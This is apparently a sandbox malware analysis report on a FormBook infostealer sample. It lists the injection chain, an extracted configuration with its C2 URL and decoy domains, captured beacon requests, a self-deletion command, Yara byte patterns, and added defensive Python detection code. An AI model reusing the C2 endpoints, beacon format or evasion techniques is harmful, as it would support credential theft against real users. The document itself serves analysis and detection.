Analysis Report AQJEKNHnWK.exe

Overview

General Information

Sample Name: AQJEKNHnWK.exe
Analysis ID: 383851
MD5: 5d8702803555ff684424ebd13eda9f47
SHA1: f8b1197457782ba958fc7178fb838119c8138374
SHA256: f7e96b7c6612b709e413bbc8c72796cadbb7ce91ed17ec77d5ba4d4422e729cb
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • AQJEKNHnWK.exe (PID: 1724 cmdline: 'C:\Users\user\Desktop\AQJEKNHnWK.exe' MD5: 5D8702803555FF684424EBD13EDA9F47)
    • AQJEKNHnWK.exe (PID: 4772 cmdline: 'C:\Users\user\Desktop\AQJEKNHnWK.exe' MD5: 5D8702803555FF684424EBD13EDA9F47)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 1156 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 5560 cmdline: /c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
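
The tree above draws the injection chain: the sample, a second instance of itself (the hollowing target), the desktop explorer.exe, a 32-bit C:\Windows\SysWOW64\explorer.exe, and finally a cmd.exe that deletes the original file. As an added example that is not part of the Joe Sandbox report, the Python below turns that lineage into three process-creation detections over constructed Sysmon-style events (pid, ppid, image, command line) built from the tree. Assumptions, marked in the code: the parents of the sample and of the desktop explorer.exe are unknown (ppid 0), the desktop shell's image is C:\Windows\explorer.exe, the cmd.exe image is the SysWOW64 copy because its parent is 32-bit, and the command line carries the double quotes Windows would show where the tree prints single quotes. One caveat the code encodes: the sandbox nests explorer.exe (PID 3388) under the sample because it was injected into, but process-creation telemetry shows no such parent, so the detections key on a process spawning its own image, on explorer.exe starting SysWOW64\explorer.exe, and on a del command aimed at an executable already seen running.

```python
"""Process-lineage detections for the FormBook chain in the Startup tree."""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

# Constructed from the Startup tree above. ppid 0 = parent not known from
# the report; the explorer.exe 3388 image, the SysWOW64 cmd.exe path and the
# double quotes in the del command line are assumptions.
EVENTS = [
    Proc(1724, 0,    r"C:\Users\user\Desktop\AQJEKNHnWK.exe", r'"C:\Users\user\Desktop\AQJEKNHnWK.exe"'),
    Proc(4772, 1724, r"C:\Users\user\Desktop\AQJEKNHnWK.exe", r'"C:\Users\user\Desktop\AQJEKNHnWK.exe"'),
    Proc(3388, 0,    r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    Proc(1156, 3388, r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\explorer.exe"),
    Proc(5560, 1156, r"C:\Windows\SysWOW64\cmd.exe", r'cmd.exe /c del "C:\Users\user\Desktop\AQJEKNHnWK.exe"'),
    Proc(4228, 5560, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# 'del <path>.exe' with the path in double or single quotes, or bare.
DEL_RE = re.compile(r"""\bdel\b\s+["']?([^"']+?\.exe)["']?""", re.IGNORECASE)


def _base(image):
    """File name component of an image path, lower-cased."""
    return image.rsplit("\\", 1)[-1].lower()


def by_pid(events):
    return {e.pid: e for e in events}


def self_spawned(events):
    """PIDs whose parent runs the same image: the visible half of the
    hollowing step (the sample starts a second copy of itself)."""
    procs = by_pid(events)
    return [e.pid for e in events
            if e.ppid in procs and procs[e.ppid].image.lower() == e.image.lower()]


def wow64_explorer_from_explorer(events):
    """32-bit explorer.exe started by an explorer.exe; the shell never does
    this on its own, here it is the injected desktop explorer doing it."""
    procs = by_pid(events)
    return [e.pid for e in events
            if e.image.lower().endswith(r"\syswow64\explorer.exe")
            and e.ppid in procs and _base(procs[e.ppid].image) == "explorer.exe"]


def self_deletion(events):
    """(cmd pid, deleted path, pid that ran it) for every cmd.exe 'del' whose
    target is the image of a process seen earlier in the stream."""
    images = {}
    for e in events:                      # first PID seen per image path
        images.setdefault(e.image.lower(), e.pid)
    hits = []
    for e in events:
        if _base(e.image) != "cmd.exe":
            continue
        m = DEL_RE.search(e.cmdline)
        if m and m.group(1).lower() in images:
            hits.append((e.pid, m.group(1), images[m.group(1).lower()]))
    return hits


def alerts(events):
    """All three detections over one event stream."""
    return {
        "self_spawn": self_spawned(events),
        "wow64_explorer": wow64_explorer_from_explorer(events),
        "self_delete": self_deletion(events),
    }


if __name__ == "__main__":
    for name, hits in alerts(EVENTS).items():
        print(f"{name:15s} {hits}")
```

Each detection stands on its own in EDR data: the self-spawn is noisy for installers and updaters, but the SysWOW64\explorer.exe child and the del of a just-executed file are rare enough to page on.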

Malware Configuration

Threatname: FormBook (the "C2 list" entry is the live check-in URL; the "decoy" entries are domains the bot also beacons to with the same path, so that the real C2 is hidden among them)

{"C2 list": ["www.th0rgramm.com/hx3a/"], "decoy": ["xn--ol-xia.com", "gracieleesgiftsandmore.com", "invenufas.com", "nexgencoder.com", "virginiabrightseleccion.com", "selectenergyservicestx.com", "warchocki.com", "xn--comercialvioo-tkb.website", "losangelesbraiders.com", "skaraonline.com", "freeworldsin.com", "jabberjawmobile.com", "orgoneartist.com", "xyfzfl.com", "arooko.com", "investmentpartners.limited", "ugonget.com", "ringforklift.com", "recovatek.com", "bukannyaterbuai24.com", "formula-kuhni.com", "cyfss.com", "stkify.com", "aksharnewtown.com", "libroricardoanaya.com", "phillhutt.com", "mywinnersworld.com", "school17obn.com", "cocoshop.info", "netzcorecloud.com", "bookbeachchairs.com", "summitsolutionsnow.com", "yakudatsu-hikaku.com", "elitedrive.net", "jjwheelerphotography.com", "motcamket.com", "hatikuturkila.com", "tonton-koubou.com", "roughcuttavernorder.com", "leagueofconsciouscreatives.com", "worldsabroad.com", "ezmodafinil.com", "apettelp.club", "xn--jvrr98g37n88d.com", "gobiodisc.com", "alliedcds.com", "jillspickles.com", "alfenas.info", "herbalyesman.xyz", "sugary-sweet.com", "rigscart.com", "curiget.xyz", "stacksyspro.net", "sxqyws.net", "solocubiertos.com", "actuualizarinfruma.com", "thecurmudgeonsspeakout.com", "paydaegitimkurumlari.com", "sellingdealsinheels.com", "dezhou8.xyz", "thelitigatorsbookclub.com", "rainbowsdepot.com", "serenityislegalveston.com", "contactredzonetalent.com"]}
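
The configuration has two parts: the "C2 list" entry is the live check-in URL (host plus path), while the "decoy" entries are domains the bot beacons to with the same path so that the true C2 is buried among sixty-odd harmless hosts; the four requests under Networking below all go to decoy-list domains. As an added example (not Joe Sandbox's or the configuration extractor's code), the Python below cross-checks observed requests against the configuration. The config values are taken from this report with the decoy list shortened to the hosts that appear in the traffic section; the first five observed requests are copied from the report (the fifth is a URL fragment from explorer.exe memory, cut short as printed); the last two are constructed, as marked in the code. The "unlisted-c2-path" label is the case a practitioner wants surfaced: a beacon with the configured path to a host in neither list, which is exactly where the julianlawoffices.law string lands.

```python
"""Cross-check observed HTTP beacons against an extracted FormBook config."""
import re
from urllib.parse import parse_qsl, urlsplit

# From this report's Malware Configuration section; decoy list shortened to
# the hosts that show up in the traffic section (the full list is above).
CONFIG = {
    "C2 list": ["www.th0rgramm.com/hx3a/"],
    "decoy": [
        "gracieleesgiftsandmore.com", "mywinnersworld.com", "tonton-koubou.com",
        "phillhutt.com", "formula-kuhni.com", "rainbowsdepot.com",
    ],
}

# (Host header, request target). First four: requests from the Networking
# section. Fifth: URL fragment found in explorer.exe memory, truncated in the
# report. Last two: constructed to exercise the remaining branches.
OBSERVED = [
    ("www.mywinnersworld.com", "/hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD"),
    ("www.gracieleesgiftsandmore.com", "/hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD"),
    ("www.tonton-koubou.com", "/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD"),
    ("www.phillhutt.com", "/hx3a/?tZUT=etiEYBoPDxOhXHdNW+toGoO48BEbVYBhZG7o21xT+1ckFZjGUMv71muAk6m7YJWGV3TF&9r98J=FbY8OBD"),
    ("julianlawoffices.law", "/hx3a/?tZUT=Iu/IXyUbTVDu5P2JH19Ubbm/NNayCdBr7HPQNpzBLmA"),
    ("www.th0rgramm.com", "/hx3a/?tZUT=" + "A" * 40 + "&9r98J=FbY8OBD"),   # constructed: real C2
    ("www.example.com", "/index.html"),                                     # constructed: unrelated
]


def normalize_host(host):
    """Lower-case, drop a trailing dot and a leading 'www.' so config entries
    and Host headers compare equal."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def parse_c2_entries(config):
    """Split 'host/path/' C2 entries into (normalized host, path) pairs."""
    entries = []
    for item in config["C2 list"]:
        host, _, path = item.partition("/")
        entries.append((normalize_host(host), "/" + path))
    return entries


def looks_like_checkin(target):
    """Heuristic for the beacon shape in this report: a '/<token>/' path and
    exactly two query parameters, the first carrying a long base64-like blob."""
    parts = urlsplit(target)
    if not re.fullmatch(r"/[A-Za-z0-9]{2,8}/", parts.path):
        return False
    params = parse_qsl(parts.query, keep_blank_values=True)
    return len(params) == 2 and len(params[0][1]) >= 8


def classify(host, target, config):
    """One of 'c2', 'decoy', 'unlisted-c2-path', 'unrelated'."""
    h = normalize_host(host)
    req_path = urlsplit(target).path
    c2 = parse_c2_entries(config)
    decoys = {normalize_host(d) for d in config["decoy"]}
    if any(h == c2h and req_path == c2p for c2h, c2p in c2):
        return "c2"
    on_c2_path = any(req_path == c2p for _, c2p in c2)
    if h in decoys and on_c2_path:
        return "decoy"
    if on_c2_path or looks_like_checkin(target):
        return "unlisted-c2-path"   # beacon shape, host in neither list: review
    return "unrelated"


def triage(observed, config):
    """{label: [hosts in observation order]}: separates the C2 from decoy noise."""
    out = {}
    for host, target in observed:
        out.setdefault(classify(host, target, config), []).append(host)
    return out


if __name__ == "__main__":
    for label, hosts in triage(OBSERVED, CONFIG).items():
        print(f"{label:17s} {', '.join(hosts)}")
```

The path comparison is deliberately exact: the decoys share the C2's path, so host membership, not the path, is what separates the real channel from the noise, and a block list built from the decoy domains would cut off legitimate sites while leaving the C2 untouched.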

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 entries; remainder not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.AQJEKNHnWK.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.AQJEKNHnWK.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.AQJEKNHnWK.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
1.1.AQJEKNHnWK.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.AQJEKNHnWK.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 entries; remainder not shown)
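
The two community rules above match on fixed byte sequences (Formbook_1) and on three push imm32 instructions whose immediates, per the string names, are the hashes under which FormBook looks up its sqlite3 functions (the JPCERT/CC rule). As an added example, not the rule authors' or Joe Sandbox's code, the Python below re-implements the string search over a constructed buffer with the report's strings planted at the offsets listed for 1.2.AQJEKNHnWK.exe.400000.0.unpack, decodes the push immediates, and applies an assumed "at least N strings" condition; the real rules' conditions are not on this page and are not reproduced. $sequence_0 decodes to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the RDTSC delta behind the "Tries to detect virtualization through RDTSC time measurements" signature, so one rule string doubles as the anti-VM indicator.

```python
"""Reproduce the Yara string hits above on a memory image with plain Python."""

# Strings of the two community rules exactly as the report prints them.
# Rule names and bytes are the report's; the instruction comments are ours.
FORMBOOK_1_SEQUENCES = {
    # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax: RDTSC timing check
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "$sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "$sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "$sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "$sequence_8": "3C 54 74 04 3C 74 75 F4",
    "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
# JPCERT/CC strings: each is 'push imm32' (opcode 0x68); the names say the
# immediates are the API hashes for sqlite3_step/_column_text/_column_blob.
JPCERT_SEQUENCES = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}
# Offsets the report lists for 1.2.AQJEKNHnWK.exe.400000.0.unpack; used only
# to plant the strings into the constructed buffer in build_sample().
REPORTED_OFFSETS = {
    "$sequence_0": [0x77E8, 0x7B82], "$sequence_1": [0x13895],
    "$sequence_2": [0x13381], "$sequence_3": [0x13997], "$sequence_4": [0x13B0F],
    "$sequence_5": [0x859A], "$sequence_6": [0x125FC], "$sequence_7": [0x9312],
    "$sequence_8": [0x18987], "$sequence_9": [0x19A2A],
    "$sqlite3step": [0x158B9, 0x159CC], "$sqlite3text": [0x158E8, 0x15A0D],
    "$sqlite3blob": [0x158FB, 0x15A23],
}


def hex_bytes(text):
    """'03 C8 0F' -> b'\\x03\\xc8\\x0f'."""
    return bytes.fromhex(text.replace(" ", ""))


def push_immediate(text):
    """Decode a 5-byte 'push imm32' string to the constant it pushes."""
    raw = hex_bytes(text)
    if len(raw) != 5 or raw[0] != 0x68:
        raise ValueError("not a push imm32")
    return int.from_bytes(raw[1:], "little")


def find_all(buf, pattern):
    """Every offset of pattern in buf, overlapping matches included."""
    hits, start = [], 0
    while (i := buf.find(pattern, start)) >= 0:
        hits.append(i)
        start = i + 1
    return hits


def scan(buf, sequences, min_hits):
    """(rule_fired, {string: [offsets]}) for one rule's strings. min_hits is
    our assumed stand-in for the rule condition, which the report omits."""
    offsets = {name: find_all(buf, hex_bytes(h)) for name, h in sequences.items()}
    fired = sum(1 for hits in offsets.values() if hits) >= min_hits
    return fired, offsets


def build_sample(size=0x1A000):
    """Constructed stand-in for the unpacked image: 0xCC filler (a byte that
    occurs in none of the strings) with the report's strings planted at the
    listed offsets, so scan() must report exactly those offsets."""
    buf = bytearray(b"\xCC" * size)
    for table in (FORMBOOK_1_SEQUENCES, JPCERT_SEQUENCES):
        for name, text in table.items():
            pat = hex_bytes(text)
            for off in REPORTED_OFFSETS[name]:
                buf[off:off + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    image = build_sample()
    for rule, strings, need in (("Formbook_1", FORMBOOK_1_SEQUENCES, 7),
                                ("Formbook (JPCERT/CC)", JPCERT_SEQUENCES, 3)):
        fired, offsets = scan(image, strings, need)
        print(f"{rule}: {'match' if fired else 'no match'}")
        for name, hits in offsets.items():
            print(f"  {name}: {', '.join(hex(h) for h in hits) or '-'}")
    for name, text in JPCERT_SEQUENCES.items():
        print(f"{name} pushes {push_immediate(text):#010x}")
```

To run it against a real dump, replace build_sample() with the file contents. The offsets listed above for the .sdmp and .raw.unpack variants are all exactly 0xE00 higher than the .unpack ones, so expect that shift when comparing a raw dump with the mapped image.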

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (the full configuration, C2 list and decoy list, is reproduced in the Malware Configuration section above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll, ReversingLabs: Detection: 20% (nsx*.tmp is the temporary plugin directory an NSIS installer creates, so the submitted file is an NSIS-wrapped loader)
Multi AV Scanner detection for submitted file
Source: AQJEKNHnWK.exe, VirusTotal: Detection: 18%
Source: AQJEKNHnWK.exe, ReversingLabs: Detection: 35%
Yara detected FormBook
Source: Yara match, File source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.explorer.exe.2d564d0.3.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.explorer.exe.4e47960.6.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: AQJEKNHnWK.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: explorer.pdbUGP source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: AQJEKNHnWK.exe, 00000000.00000003.210067388.000000001F0E0000.00000004.00000001.sdmp, AQJEKNHnWK.exe, 00000001.00000002.256332303.0000000000B5F000.00000040.00000001.sdmp, explorer.exe, 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: AQJEKNHnWK.exe, explorer.exe
Source: Binary string: explorer.pdb source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\AQJEKNHnWK.exe, Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\AQJEKNHnWK.exe, Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\AQJEKNHnWK.exe, Code function: 0_2_004026BC FindFirstFileA,
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\AQJEKNHnWK.exe, Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\AQJEKNHnWK.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 23.227.38.74:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 23.227.38.74:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 23.227.38.74:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.th0rgramm.com/hx3a/
Source: global traffic, HTTP traffic detected: GET /hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD HTTP/1.1, Host: www.mywinnersworld.com, Connection: close, Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty, all seven bytes are 0x00)
Source: global traffic, HTTP traffic detected: GET /hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD HTTP/1.1, Host: www.gracieleesgiftsandmore.com, Connection: close, Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty, all seven bytes are 0x00)
Source: global traffic, HTTP traffic detected: GET /hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD HTTP/1.1, Host: www.tonton-koubou.com, Connection: close, Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty, all seven bytes are 0x00)
Source: global traffic, HTTP traffic detected: GET /hx3a/?tZUT=etiEYBoPDxOhXHdNW+toGoO48BEbVYBhZG7o21xT+1ckFZjGUMv71muAk6m7YJWGV3TF&9r98J=FbY8OBD HTTP/1.1, Host: www.phillhutt.com, Connection: close, Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty, all seven bytes are 0x00)
Note: all four Host headers above are entries of the configuration's decoy list, not of the C2 list, and the three Snort SIDs fire on one and the same flow, 192.168.2.3:49724 -> 23.227.38.74:80.
Source: Joe Sandbox View, IP Address: 23.227.38.74
Source: Joe Sandbox View, ASN Name: INTERQGMOInternetIncJP
Source: Joe Sandbox View, ASN Name: DXTL-HKDXTLTseungKwanOServiceHK
Source: Joe Sandbox View, ASN Name: WEBHOST1-ASRU
Source: unknown, DNS traffic detected: queries for: www.rainbowsdepot.com
Source: explorer.exe, 00000004.00000000.241718690.00000000089FD000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
